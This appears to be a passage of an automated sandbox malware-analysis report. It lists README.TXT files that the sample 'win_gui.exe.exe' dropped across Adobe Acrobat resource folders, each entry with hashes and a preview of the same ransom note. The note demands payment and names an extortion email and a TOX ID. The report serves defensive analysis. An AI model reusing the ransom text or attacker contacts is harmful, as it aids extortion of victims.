                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
